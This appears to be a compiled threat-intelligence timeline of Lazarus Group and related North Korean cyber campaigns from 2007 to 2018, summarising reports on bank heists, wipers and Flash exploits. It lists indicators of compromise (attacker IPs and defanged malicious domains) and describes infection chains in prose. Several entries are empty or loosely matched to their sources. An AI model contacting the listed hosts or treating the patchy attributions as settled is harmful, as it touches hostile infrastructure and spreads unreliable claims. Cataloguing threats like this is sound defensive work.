Lazarus Malware, TTPs, and Evolution

2007-2015

Operation Flame

Date:: 2007-07-03 URL:: https://darkreading.com/threat-intelligence/sony-hackers-behind-previous-cyberattacks-tied-to-north-korea-/d/d-id/1324422 Tags:: Details:: Indicators::

Operation Troy DDoS Attacks

Date:: 2009-2012 URL:: https://news.bbc.co.uk/2/hi/asia-pacific/8142282.stm https://theguardian.com/world/2009/jul/11/south-korea-blames-north-korea-cyber-attacks Tags:: Details::

Cyber-espionage campaign that utilized unsophisticated DDoS to target the South Korean govt Indicators::

MYDOOM Malware and Dozer Malware DDoS Attacks

Date:: 2009-07-04 URL:: https://usna.edu/CyberCenter/_files/documents/Operation-Blockbuster-Report.pdf Tags:: Details::

The Lazarus Group's first major hacking incident took place on July 4, 2009, and sparked the beginning of Operation Troy.
This attack utilized the Mydoom and Dozer malware to launch a large-scale, but quite unsophisticated, DDoS attack against US and South Korean websites.
The volley of attacks struck about three dozen websites and placed the text Memory of Independence Day in the master boot record (MBR). Indicators::

Ten Days of Rain Attacks

Date:: 2011-03-04 URL:: https://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea https://web.archive.org/web/20140602010545/https://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea Tags:: Details::

Ten Days of Rain attack targets South Korean media, financial, and critical infrastructure targets. Compromised computers within South Korea are used to launch DDoS attacks.
On March 4th of this year, exactly 20 months to the day of a similar incident on US Independence Day in 2009, a botnet based out of South Korea launched Distributed Denial of Service (DDoS) attacks against 40 sites affiliated with South Korean government, military and civilian critical infrastructure as well as U.S. Forces Korea and the U.S. Air Force Base in Kunsan, South Korea. Indicators::

Nnghyuo Bank DDoS Attacks

Date:: 2011-04-01 URL:: https://bbc.com/news/world-asia-pacific-13263888 Tags:: Details::

Prosecutors said that a laptop used by a subcontractor became in September 2010 a zombie PC operated by the North, which... later remotely staged the attack through the laptop.
One of the Internet Protocol (IP) addresses used to break into Nonghyup's system was the same as one used in March for a distributed denial-of-service (DDoS) attack that originated in North Korea, they added.
The software used in the incident was also similar to that employed in July 2009, when a number of South Korean government websites were attacked, the prosecutors said.
The hackers made the laptop a zombie computer on Sept. 4 in 2010 and managed it for seven months, obtaining inside information and operating the file deletion command remotely, according to the prosecution. Indicators::

Operation Troy / DarkSeoul Attacks

Date:: 2013-03-20 URL:: https://web.archive.org/web/20130818124159/https://mcafee.com/us/resources/white-papers/wp-dissecting-operation-troy.pdf Tags:: Details::

Wiper attack that targeted three South Korean broadcast companies, financial institutes, and an ISP
At the time, two other groups going by the personas ″NewRomanic Cyber Army Team and WhoIs Team″, took credit for that attack
The intention of the Dark Seoul adversaries: spy on and disrupt South Korea’s military and government activities.
The Troy-era malware is based on the same source code used to create these specialized variants and shares many commonalities, such as bs.dll and payload.dll, which are found consistently throughout the families.
The attackers have attempted since 2009 to install the capability to destroy their targets using an MBR wiper component, as seen in the Dark Seoul incident.
From our analysis we have established that Operation Troy had a focus from the beginning to gather intelligence on South Korean military targets.
We have also linked other high-profile public campaigns conducted over the years against South Korea to Operation Troy, suggesting that a single group is responsible.
A news report from a South Korean Arirang TV agency, dated 2016, about an attack on South Korean television stations and banks as part of DarkSeoul operation. This attack performed by North Korean hackers and was investigated by the South Korea’s National Police Agency, who detected two IP addresses 175.45.178.19 and 175.45.178.97, used by hackers to control malware. Both IP addresses are in the same block of IP addresses the IP 175.45.178.222, which was discovered by Group-IB specialists. Indicators::

Sony Pictures Hack

Date:: 2014-11-24 URL:: https://fbi.gov/news/pressrel/press-releases/update-on-sony-investigation https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and Tags:: Details::

Sony Pictures Entertainment (SPE) and its comedic film The Interview, which depicted a fictional Kim Jong-Un, the Chairman of the Workers’ Party of Korea and the supreme leader of North Korea
Lazarus targeted individuals and entities associated with the production of The Interview and employees of SPE, sending them malware that the subjects used to gain unauthorized access to Sony's network
Once inside Sony's network, the subjects stole movies and other confidential information, and then effectively rendered thousands of computers inoperable
The same group of subjects also targeted individuals associated with the release of The Interview, among other victims.
Perpetrators identified themselves as the Guardians of Peace.
Large amounts of data were stolen and slowly leaked in the days following the attack.
U.S. investigators say the culprits spent at least two months copying critical files
The attack was conducted using malware. Server Message Block Worm Tool to conduct attacks
Components of the attack included a listening implant, backdoor, proxy tool, destructive hard drive tool, and destructive target cleaning tool
The components clearly suggest an intent to gain repeated entry, extract information, and be destructive, as well as remove evidence of the attack
November 24, 2014 malware previously installed rendered many Sony employees' computers inoperable by the software, with the warning by a group calling themselves the Guardians of Peace, along with a portion of the confidential data taken during the hack.
Several Sony-related Twitter accounts were also taken over
Park was a North Korean hacker that worked for the country's Reconnaissance General Bureau, the equivalent of the
The US DOJ also asserted that Park was partially responsible for arranging WannaCry, having developed part of the ransomware software
https://en.wikipedia.org/wiki/Sony_Pictures_hack Indicators::

Operation Red Dot against South Korean Govt/Defence Co's

Date:: 2014-2015 URL:: https://virusbulletin.com/virusbulletin/2018/11/vb2018-paper-hacking-sony-pictures/ Tags:: Details::

Variants of the malware used in the Sony Pictures hack were found in attacks which targeted the websites of North Korean research and governmental organizations, and the South Korean defence industry.
AhnLab refers to these attacks – which occurred from 2014 to 2015 – as Operation Red Dot. The variants in this operation share similar code and names, such as AdobeArm.exe and msnconf.exe.
The main infection methods are: executable files disguised as document files (HWP, PDF), disguised installers, and exploits of Hangul Word Processor (HWP) file vulnerabilities.
The document files, which are listed in Table 3, are decoys disguised as legitimate documents, such as address books, deposit slips and invitations to lure victims into opening them. Indicators::

Banco del Austro in Ecuador - SWIFT/Bank Heist - $12M

Date:: 2015-01-12 URL:: https://trendmicro.com/vinfo/us/security/news/cyber-attacks/ecuadorean-bank-loses-12m-via-swift https://reuters.com/article/us-cyber-heist-swift-specialreport-idUSKCN0YB0DD Tags:: Details::

Banco del Austro (BDA) in Ecuador instructed San Francisco-based Wells Fargo to transfer money to bank accounts in Hong Kong. Indicators::

South Korea blames North Korea for December hack on nuclear operator

Date:: 2015-03-17 URL:: https://reuters.com/article/us-nuclear-southkorea-northkorea-idUSKBN0MD0GR20150317/ Tags:: Kimsuky Details:: Indicators::

Bangledesh Bank Employees spear-phished

Date:: 2015-03-30 URL:: https://newyorker.com/magazine/2021/04/26/the-incredible-rise-of-north-koreas-hacking-army Tags:: Details::

By March the hackers had a backdoor to the bank's electronic communication system allowing them to send messages to one another in a way that mimicked the bank’s encrypted-communication protocols, and did not alert security to their presence. Indicators::

2016

Multiple spear-phishing campaigns targetting employees of US defense contractors, energy companies, aerospace companies, technology companies, the U.S.Department of State, and the U.S. Department of Defense

Date:: 2016-2020 URL:: https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and Tags:: Details:: Indicators::

Sony Pictures Hack Report Released: Operation Blockbuster

Date:: 2016-02-01 URL:: https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf Tags:: Details::

Joint, two-year-long effort between Kaspersky Lab, AlienVault, Symantec, Invincea, ThreatConnect, Volexity, and PunchCyber Indicators::

A bank in the Philippines attacked

Date:: 2016-02-01 URL:: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8ae1ff71-e440-4b79-9943-199d0adb43fc&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments https://swift.com/insights/press-releases/swift-comments-on-malware-reports https://reuters.com/article/us-vietnam-cybercrime-idUSKCN0Y60EN/ Tags:: Details::

Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam.
Malware used by the group was also deployed in targeted attacks against a bank in the Philippines. In addition to this, some of the tools used share code similarities with malware used in historic attacks linked to a threat group known as Lazarus. The attacks can be traced back as far as October 2015, two months prior to the discovery of the failed attack in Vietnam, which was hitherto the earliest known incident.
The attack against the Bangladesh central bank triggered an alert by payments network SWIFT, after it was found the attackers had used malware to cover up evidence of fraudulent transfers. SWIFT issued a further warning, saying that it had found evidence of malware being used against another bank in a similar fashion. Vietnam’s Tien Phong Bank subsequently stated that it intercepted a fraudulent transfer of over $1 million in the fourth quarter of last year. SWIFT concluded that the second attack indicates that a wider and highly adaptive campaign is underway targeting banks.
A third bank, Banco del Austro in Ecuador, was also reported to have lost $12 million to attackers using fraudulent SWIFT transactions. However, no details are currently known about the tools used in this incident or if there are any links to the attacks in Asia.
Symantec has identified three pieces of malware which were being used in limited targeted attacks against the financial industry in South-East Asia: Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee. At first, it was unclear what the motivation behind these attacks were, however code sharing between Trojan.Banswift (used in the Bangladesh attack used to manipulate SWIFT transactions) and early variants of Backdoor.Contopee provided a connection. Indicators::

Bangledesh Bank - SWIFT Heist - $81M

Date:: 2016-02-04 URL:: https://en.wikipedia.org/wiki/Bangladesh_Bank_robbery https://reuters.com/investigates/special-report/cyber-heist-federal/ https://reuters.com/article/us-usa-fed-bangladesh-malware-idUSKCN0WD1EV/ Tags:: Details::

The attacks were focused on banking infrastructure and staff, exploiting vulnerabilities in commonly used software or websites, bruteforcing passwords, using keyloggers and elevating privileges. However, the way banks use servers with SWIFT software installed requires personnel responsible for the administration and operation. Sooner or later, the attackers find these personnel, gain the necessary privileges, and access the server connected to the SWIFT messaging platform. With administrative access to the platform they can manipulate software running on the system as they wish. There is not much that can stop them, because from a technical perspective, their activities may not differ from what an authorized and qualified engineer would do: starting and stopping services, patching software, modifying the database. Indicators::

BAE Systems Threat Research Blog: Cyber Heist Attribution

Date:: 2016-05-13 URL:: https://baesystemsai.blogspot.com/2016/05/cyber-heist-attribution.html Tags:: Details:: Indicators::

$16M dollars was withdrawn from roughly 1700 7-Eleven A.T.M.s across Japan using data stolen from South Africa’s Standard Bank

Date:: 2016-05-14 URL:: https://darkreading.com/cyberattacks-data-breaches/-13-million-stolen-from-japan-atms-via-stolen-s-african-bank-data Tags:: Details::

Police believe over 100 money mules might have been involved in the withdrawals, which took place the morning of May 15. Approximately 14,000 withdrawals were made -- each the maximum amount of 100,000 yen ( ~$913 US) -- from about 1,400 machines in Tokyo and 16 prefectures in Japan. 7-Eleven stores were hit presumably because they accept foreign credit cards, while many ATMs do not. Indicators::

Tien Phong Bank in Vietnam - SWIFT Heist - $1M

Date:: 2016-05-15 URL:: https://reuters.com/article/us-vietnam-cybercrime-idUSKCN0Y60EN https://threatq.com/threatquotient-blog-mystery-nation/ Tags:: Details::

Vietnam’s Tien Phong Bank said that it interrupted an attempted cyber heist that involved the use of fraudulent SWIFT messages, just like the Bangladesh Bank Heist Indicators::

North Korea Linked to Digital Attacks on Global Banks

Date:: 2016-05-26 URL:: https://web.archive.org/web/20160527014048/http://www.nytimes.com/2016/05/27/business/dealbook/north-korea-linked-to-digital-thefts-from-global-banks.html Tags:: Details::

In three recent attacks on banks, researchers working for the digital security firm Symantec said, the thieves deployed a rare piece of code that had been seen in only two previous cases: the hacking attack at Sony Pictures in December 2014 and attacks on banks and media companies in South Korea in 2013. Government officials in the United States and South Korea have blamed those attacks on North Korea, though they have not provided independent verification. Indicators::

SWIFT Heists Evidence of Stronger Ties Between North Korea and SWIFT Banking Attacks

Date:: 2016-05-27 URL:: https://anomali.com/blog/evidence-of-stronger-ties-between-north-korea-and-swift-banking-attacks Tags:: Details:: Indicators::

Operation Daybreak

Date:: 2016-06-17 URL:: https://securelist.com/operation-daybreak/75100/ Tags:: ScarCruft, CVE Details::

Flash zero-day exploit deployed by the ScarCruft APT Group
Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown (0-day) Adobe Flash Player exploit. It is also possible that the group deployed another zero day exploit, CVE-2016-0147, which was patched in April.
In the case of Operation Daybreak, the hacked website hosting the exploit kit performs a couple of browser checks before redirecting the visitor to a server controlled by the attackers hosted in Poland.
The main exploit page script contains a BASE64 decoder, as well as rc4 decryption implemented in JS.
In the first stage of the attack, the decrypted shellcode executed by the exploit downloads and executes a special DLL file. This is internally called “yay_release.dll”: Indicators::
webconncheck.myfw[.]us:8080/8xrss.php
212.7.217[.]10
reg.flnet[.]org
webconncheck.myfw[.]us

2017

According to the Treasury, NK affiliated hackers likely stole ~$571 million in cryptocurrency from five Asian exchanges in 2017 and 2018.

Date:: 2017-2018 URL:: https://docs.un.org/S/2019/171 Tags:: Money Laundering Details::

2018-09: Indonesian Crypto Company Theft $24.9M
2018-06: Bithumb2 CEX Hack Lazarus $30M
2017-12: YouBit CEX Hack (previously known as Yapizon)
2017-04: Yapizon CEX Hack 3831 BTC Indicators::

Attacks on Polish Banks

Date:: 2017-02-16 URL:: https://trendmicro.com/vinfo/pl/security/news/cyber-attacks/polish-banks-and-other-financial-organizations-hit-by-new-malware-attacks https://pcworld.com/article/411961/polish-banks-on-alert-after-mystery-malware-found-on-computers.html https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/ https://welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/ Tags:: Details::

Point of infection was the website of the Polish Financial Supervision Authority, a government watchdog for the banking sector. Independent cybersecurity outfit BadCyber found evidence that the agency’s website has had malicious JavaScript code injected into it since October until a few days ago, when the entire website was taken offline. Indicators::
125.214.195[.]17
196.29.166[.]218
sap.misapor[.]ch/vishop/view.jsp?pagenum=1
www.eye-watch[.]in/design/fancybox/Pnf.action

Lazarus Under The Hood

Date:: 2017-04-03 URL:: https://securelist.com/lazarus-under-the-hood/77908/ https://csoonline.com/article/560979/kaspersky-lab-reveals-direct-link-between-banking-heist-hackers-and-north-korea.html Tags:: Details::

Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011.
All those hundreds of samples that were collected give the impression that Lazarus is operating a factory of malware, which produces new samples via multiple independent conveyors.
We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers.
Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.
Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, same code, and the same algorithms. Keep morphing! seems to be their internal motto.
Those rare cases when they are caught with same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing. Indicators::

Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised

Date:: 2017-04-22 URL:: https://reddit.com/r/Bitcoin/comments/67lamq/yapizon_exchange_korea_got_hacked_lost_3831_btc/ https://cointelegraph.com/news/korean-bitcoin-exchange-yapizon-confirms-5-mln-hack-all-customers-to-pay-with-balances Tags:: Details::

It is worth noting that at least some of the tactics, techniques, and procedures were reportedly employed during this compromise were different than those we have observed in following intrusion attempts and as of yet there are no clear indications of North Korean involvement
The exchange confirmed the theft of 3,831 Bitcoins, “equivalent to 37.08% of the total assets.”
Indicators::

WannaCry

Date:: 2017-05-12 URL:: https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and https://arstechnica.com/tech-policy/2017/12/trump-administration-formally-blames-north-korea-for-wannacry-now-what/ https://arstechnica.com/information-technology/2017/05/theres-new-evidence-tying-wcry-ransomware-worm-to-prolific-hacking-group/ https://arstechnica.com/gadgets/2017/08/wannacry-operator-empties-bitcoin-wallets-connected-to-ransomware/ https://arstechnica.com/gadgets/2017/08/researchers-say-wannacry-operator-moved-bitcoins-to-untraceable-monero/ https://malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html Tags:: Details::

This DHS-FBI Joint Technical Alert provides information, including IOCs on the ransomware variant known as WannaCry. The U.S. Government publicly attributed this WannaCry ransomware variant to the North Korean government.
Creation of the destructive WannaCry 2.0 ransomware in May 2017
The extortion and attempted extortion of victim companies from 2017 through 2020 involving the theft of sensitive data and deployment of other ransomware. Indicators::

Group IB Report: Lazarus Arisen

Date:: 2017-05-30 URL:: https://group-ib.com/blog/lazarus/ Tags:: Details:: Indicators::

210.52.109.22 China Netcom, 210.52.109.0/24 is assigned to North Korea
175.45.178.222 Natinal Defence Commission
175.45.178.19 Ghost RAT
175.45.178.97 Ghost RAT

CISA: Report on HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure

Date:: 2017-06-13 URL:: https://us-cert.gov/ncas/alerts/TA17-164A Tags:: Details::

This Joint Technical Alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. Working with U.S. government partners, DHS and FBI identified Internet Protocol addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea’s DDoS botnet infrastructure. Indicators::

Unit42: Attacks on US defense contracts links back to perportrators of the Sony Pictures Hack

Date:: 2017-08-14 URL:: https://unit42.paloaltonetworks.com/unit42-blockbuster-saga-continues/ https://unit42.paloaltonetworks.com/unit42-the-blockbuster-sequel/ Tags:: Details::

Most notably, decoy document themes now include job role descriptions and internal policies from US defense contractors. Indicators::

CISA: DeltaCharlie Attack Malware

Date:: 2017-08-23 URL:: https://cisa.gov/sites/default/files/publications/MAR-10132963.pdf Tags:: Details::

STIX file for MAR 10132963. This MAR examines the functionality of the DeltaCharlie malware variant to manage North Korea’s distributed denial-of-service (DDOS) botnet infrastructure (refer to TA17-164A). DHS distributed this MAR to enable network defense and reduce exposure to any North Korean government malicious cyber activity. Indicators::

Why Is North Korea So Interested in Bitcoin?

Date:: 2017-09-17 URL:: https://cloud.google.com/blog/topics/threat-intelligence/why-north-korea-interested-in-bitcoin/ Tags:: Details::

Now, we may be witnessing a second wave of this campaign: state-sponsored actors seeking to steal bitcoin and other virtual currencies as a means of evading sanctions and obtaining hard currencies to fund the regime. Since May 2017, we have observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds. The spearphishing we have observed in these cases often targets personal email accounts of employees at digital currency exchanges, frequently using tax-themed lures and deploying malware (PEACHPIT and similar variants) linked to North Korean actors suspected to be responsible for intrusions into global banks in 2016. Indicators::

Stole more than 200GB of South Korean Army data

Date:: 2017-10-09 URL:: https://ft.com/content/d8bbceb0-ad64-11e7-aab9-abaa44b1e130 Tags:: Details::

which included documents known as Operational Plan 5015—a detailed analysis of how a war with the country’s northern neighbor might proceed, and, notably, a plot to decapitate North Korea by assassinating Kim Jong Un. The breach was so egregious that Kim Tae-woo, a former president of the Korea Institute for National Unification, a think tank in Seoul, told the Financial Times, Part of my mind hopes the South Korean military intentionally leaked the classified documents to the North with the intention of having a second strategy.
April 22 – Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised. (It is worth noting that at least some of the tactics, techniques, and procedures were reportedly employed during this compromise were different than those we have observed in following intrusion attempts and as of yet there are no clear indications of North Korean involvement).
April 26 – The United States announces a strategy of increased economic sanctions against North Korea. Sanctions from the international community could be driving North Korean interest in cryptocurrency, as discussed earlier.
Early May – Spearphishing against South Korean Exchange #1 begins.
Late May – South Korean Exchange #2 compromised via spearphish.
Early June – More suspected North Korean activity targeting unknown victims, believed to be cryptocurrency service providers in South Korea.
Early July – South Korean Exchange #3 targeted via spear phishing to personal account. Indicators::

The World Once Laughed at North Korean Cyberpower. No More.

Date:: 2017-10-15 URL:: https://nytimes.com/2017/10/15/world/asia/north-korea-hacking-cyber-sony.html Tags:: Details::

The North Korean cyberthreat “crept up on us,” said Robert Hannigan, the former director of Britain’s Government Communications Headquarters, which handles electronic surveillance and cybersecurity. “Because they are such a mix of the weird and absurd and medieval and highly sophisticated, people didn’t take it seriously,” he said. “How can such an isolated, backward country have this capability? Well, how can such an isolated backward country have this nuclear ability?”
North Korea began identifying promising students at an early age for special training, sending many to China’s top computer science programs. In the late 1990s, the Federal Bureau of Investigation’s counterintelligence division noticed that North Koreans assigned to work at the United Nations were also quietly enrolling in university computer programming courses in New York. Indicators::

North Korea likely behind Taiwan SWIFT cyber heist -BAE Reuters

Date:: 2017-10-16 URL:: https://www.reuters.com/article/us-cyber-heist-north-korea-taiwan/north-korea-likely-behind-taiwan-swift-cyber-heist-bae-idUSKBN1CL2VO/ Tags:: Details::

Cyber-security firm BAE Systems Plc said on Monday it believes the North Korean Lazarus hacking group is likely responsible for a recent cyber heist in Taiwan, the latest in a string of hacks targeting the global SWIFT messaging system. Indicators::

CISA: FALLCHILL and Volgmer Malware

Date:: 2017-11-14 URL:: https://cisa.gov/news-events/alerts/2017/11/14/hidden-cobra-north-korean-remote-administration-tool-fallchill https://cisa.gov/news-events/alerts/2017/11/14/hidden-cobra-north-korean-trojan-volgmer Tags:: Details::

CISA Alert TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
CISA Alert TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
These Joint Technical Alerts provide information and IOCs on malware variants used by the North Korean government to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI distributed these alerts to enable network defense and reduce exposure to any North Korean government malicious cyber activity. Indicators::

North Korea suspected in latest bitcoin heist, bankrupting Youbit exchange

Date:: 2017-12-20 URL:: https://arstechnica.com/tech-policy/2017/12/north-korea-suspected-in-latest-bitcoin-heist-bankrupting-youbit-exchange/ Tags:: Details::

The attraction of cryptocurrencies to North Korea is fairly obvious. The North Korean regime can access cryptocurrency funds with little fear of running into regulatory roadblocks. And the mounting value of bitcoin delivers high returns on the thefts and obfuscation efforts. Plus, cryptocurrencies are relatively easy to launder, either through the use of coin tumbler services (spreading out the contents of pilfered wallets across multiple smaller transactions to a large collection of other wallets makes tracking their provenance difficult) or by converting them into less easily traceable cryptocurrencies. In the case of the funds collected by the WannaCry worm's associated wallets, the wallets were emptied and apparently exchanged for XMR, the untraceable private digital currency backed by Monero. Indicators::

2018

KillDisk Variant Hits Latin American Financial Groups

Date:: 2018-01-15 URL:: https://trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html Tags:: Details::

KillDisk, along with the multipurpose, cyberespionage-related BlackEnergy, was used in cyberattacks in late December 2015 against Ukraine’s energy sector as well as its banking, rail, and mining industries. The malware has since metamorphosed into a threat used for digital extortion, affecting Windows and Linux platforms. The note accompanying the ransomware versions, like in the case of Petya, was a ruse: Because KillDisk also overwrites and deletes files (and don’t store the encryption keys on disk or online), recovering the scrambled files was out of the question. The new variant we found, however, does not include a ransom note. Indicators::

Korea In The Crosshairs

Date:: 2018-01-16 URL:: https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html Tags:: CVE, ROKRAT Details::

This article exposes the malicious activities of Group 123 during 2017. We assess with high confidence that Group 123 was responsible for the following six campaigns:
Golden Time campaign.
Evil New Year campaign.
Are you Happy? campaign.
FreeMilk campaign.
North Korean Human Rights campaign.
Evil New Year 2018 campaign.
On January 2nd of 2018, the Evil New Year 2018 was started. This campaign copies the approach of the 2017 Evil New Year campaign.
The email's attachments are two different HWP documents, both leveraging same vulnerability (CVE-2013-0808). This vulnerability targets the EPS (Encapsulated PostScript) format. The purpose of the shellcode is to download a payload from the Internet. The first email displays the following decoy document to the infected user and download the payload
The first tasks of this variant of ROKRAT is to check the operating system version. If Windows XP is detected, the malware executes an infinite loop. The purpose is to generate empty reports if opened on sandbox systems running Windows XP machines. Additionally it checks to determine if common analysis tools are currently running on the infected system. If it detects the presence of these tools, the malware performs two network requests to legitimate websites: Indicators::
discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpg

North Korea Bitten by Bitcoin Bug: Financially motivated campaigns reveal new dimension of the Lazarus Group

Date:: 2018-01-29 URL:: https://proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf Tags:: Details::

PowerRatankba, Gh0st RAT, RatankbaPOS
btc-gold.us
PowerRatankba 51.255.219.82
PowerRatankba 144.217.51.246
PowerRatankba 158.69.57.135
PowerRatankba 198.100.157.239
PowerRatankba 201.139.226.67
PowerRatankba 92.222.106.229
PowerRatankba apps.got-game.org
PowerRatankba trade.publicvm.com
PowerRatankba www.businesshop.net
PowerRatankba vietcasino.linkpc.net
coinbases.org
africawebcast.com
bitforex.linkpc.net
macintosh.linkpc.net
coinbroker.linkpc.net
moneymaker.publicvm.com Indicators::

CVE-2018-4878: Attacks Leveraging Adobe Zero-Day

Date:: 2018-02-02 URL:: https://cloud.google.com/blog/topics/threat-intelligence/attacks-leveraging-adobe-zero-day-cve-2018-4878-threat-attribution-attack-scenario-and-recommendations Tags:: APT37, CVE Details::

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.
Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims. Indicators::

Reaper: The Overlooked North Korean Actor

Date:: 2018-02-20 URL:: https://cloud.google.com/blog/topics/threat-intelligence/apt37-overlooked-north-korean-actor https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf Tags:: APT37, CVE Details::

On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).
Targeting: Primarily South Korea – though also Japan, Vietnam and the Middle East – in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.
Initial Infection Tactics: Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing sites to distribute malware more indiscriminately.
Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.
Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.
Malware: A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware. Indicators::

Lazarus: Under The Hood

Date:: 2018-03-07 URL:: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf Tags:: Bluenoroff Details::

Bluenoroff: a Child of Lazarus: Clearly, even before the Operation Blockbuster announcement, Lazarus had an enormous budget for its operations and would need a lot of money to run its campaigns. Ironically, Novetta's initiative could have further increased the already rising operating costs of Lazarus attacks, which in turn demanded better financing to continue its espionage and sabotage
operations. So, one of the new objectives of Lazarus Group could be to become self-sustaining and to go after money. This is where Bluenoroff, a Lazarus unit, enters the story. Based on our analysis, we believe this unit works within the larger Lazarus Group, reusing its backdoors and leveraging the access it created, while penetrating targets that have large financial streams. Of
course it implies a main focus on banks, but banks are not the only companies that are appearing on the radar of Bluenoroff: financial companies, traders and casinos also fall within Bluenoroff’s area of interest. Indicators::

Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant, CVE-2018-4878

Date:: 2018-03-18 URL:: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/ https://www.cisa.gov/news-events/analysis-reports/ar19-252a Tags:: CVE Details::

On February 28, the McAfee Advanced Threat Research team discovered that the cybercrime group Hidden Cobra continues to target cryptocurrency and financial organizations. In this analysis, we observed the return of Hidden Cobra’s Bankshot malware implant surfacing in the Turkish financial system. Based on the code similarity, the victim’s business sector, and the presence of control server strings, this attack resembles previous attacks by Hidden Cobra conducted against the global financial network SWIFT.
Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document. The document contains an embedded Adobe Flash exploit, which was recently announced by the Korean Internet Security agency. The exploit, which takes advantage of CVE-2018-4878, allows an attacker to execute arbitrary code such as an implant.
Bankshot implants are distributed from a domain with a name similar to that of the cryptocurrency-lending platform Falcon Coin, but the similarly named domain is not associated with the legitimate entity. The malicious domain falcancoin.io was created December 27, 2017, and was updated on February 19, only a few days before the implants began to appear. These implants are variations of earlier forms of Bankshot, a remote access tool that gives an attacker full capability on a victim’s system. This implant also contains functionality to wipe files and content from the targeted system to erase evidence or perform other destructive actions. Bankshot was first reported by the Department of Homeland Security on December 13, 2017, and has only recently resurfaced in newly compiled variants. The sample we analyzed is 99% similar to the documented Bankshot variants from 2017.
The Bankshot implant is attached to a malicious Word document with the filename Agreement.docx. The document appears to be an agreement template for Bitcoin distribution between an unknown individual in Paris and a to-be-determined cryptocurrency exchange. The author of this document is test-pc. It was created February 26 and was submitted from the Netherlands. The document contains an embedded Flash script that exploits CVE-2018-4878 and downloads and executes the DLL implant from falcancoin.io.
We discovered two more documents, written in Korean, that exploit the same vulnerability as Agreement.docx. These documents appear to be part of the same campaign and may have been used on different targets. These documents also communicated with falcancoin.io to install Bankshot and also contain themes around cryptocurrency security. Indicators::
falcancoin[.]io

Lazarus KillDisks Central American Casino

